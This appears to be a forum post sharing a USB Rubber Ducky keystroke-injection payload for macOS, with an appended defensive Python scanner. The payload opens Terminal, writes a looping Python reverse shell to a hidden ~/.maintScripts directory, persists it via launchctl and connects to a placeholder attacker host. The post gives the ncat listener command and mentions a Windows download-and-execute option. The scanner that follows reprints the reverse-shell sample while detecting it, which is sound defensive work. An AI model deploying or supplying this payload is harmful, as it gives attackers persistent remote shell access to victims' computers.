Hi all,
Here are my first additions to this community (after owning the Duck for two days!)
I've created a pull request for the simple duck payload generator by skysploit if you wish to clone my repository and try these in the simple-ducky environment.
https://github.com/kidovate/simple-ducky/commit/496786541282825b9c2034f06b7a57469434281d
First of all, a new Mac OS X payload based on Python (much more reliable!):

REM Mac OSX Rev by Christian Stewart (@kidovate)
GUI SPACE
DELAY 500
STRING terminal
DELAY 400
ENTER
DELAY 1000
STRING cd ~
ENTER
STRING mkdir .maintScripts
ENTER
STRING cd .maintScripts
ENTER
STRING echo "while true; do sleep 5 && python -c 'import socket,subprocess,os;
STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect((\"attackerip\",attackerport));
STRING os.dup2(s.fileno(),0);
STRING os.dup2(s.fileno(),1);
STRING os.dup2(s.fileno(),2);
STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'; done" > script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/.maintScripts/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING exit
ENTER

Be sure to replace "attackerip" with your IP and "attackerport" with your port.
To receive your shell, run:
ncat -vl attackerport
... with your port replacing "attackerport" of course.
I have also added a "download JAR and execute" option to the Windows part of skysploit's code.
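
For defenders, an added example (not part of the original post or of simple-ducky) that looks for the on-disk artifact this payload leaves behind: an executable script inside a hidden directory in the user's home whose text combines a TCP socket, redirection of file descriptors 0-2 onto it, and an interactive `/bin/sh`. The indicator names, the `CORE` set and the 1 MB size limit are assumptions of this example, and it inspects only files, not the launchd job.

```python
import re
import stat
from pathlib import Path

# Constructed sample: script.sh as the post's echo line would write it (placeholders kept).
SAMPLE = ("while true; do sleep 5 && python -c 'import socket,subprocess,os;"
          "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
          "s.connect((\"attackerip\",attackerport));os.dup2(s.fileno(),0);"
          "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
          "p=subprocess.call([\"/bin/sh\",\"-i\"]);'; done\n")

# Indicator names and patterns are this example's own choices (assumptions).
INDICATORS = {
    "python_inline": re.compile(r"python[0-9.]*\s+-c\b"),
    "tcp_socket": re.compile(r"socket\.socket\(\s*socket\.AF_INET"),
    "fd_redirect": re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)"),
    "interactive_sh": re.compile(r"/bin/(?:ba)?sh[\"']?\s*,\s*[\"']-i"),
    "retry_loop": re.compile(r"while\s+true\s*;\s*do\s+sleep\s+\d+"),
}
CORE = {"tcp_socket", "fd_redirect", "interactive_sh"}  # high-confidence combination

def match_indicators(text):
    """Return the sorted names of all indicators found in a script's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(text):
    """True only when socket, fd redirection and interactive shell all appear."""
    return CORE <= set(match_indicators(text))

def scan_hidden_dirs(home):
    """Check executable regular files directly inside dot-directories of `home`."""
    findings = []
    for fpath in sorted(Path(home).glob(".*/*")):
        try:
            st = fpath.stat()
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & 0o111 or st.st_size > 1_000_000:
                continue
            text = fpath.read_text(errors="replace")
        except OSError:
            continue  # unreadable or vanished file: skip rather than abort the scan
        if is_suspicious(text):
            findings.append((str(fpath), match_indicators(text)))
    return findings

if __name__ == "__main__":
    print("sample indicators:", match_indicators(SAMPLE))
    for path, hits in scan_hidden_dirs(Path.home()):
        print("suspicious:", path, hits)
```

Requiring all three core indicators keeps ordinary maintenance scripts that merely loop or call `python -c` from being flagged.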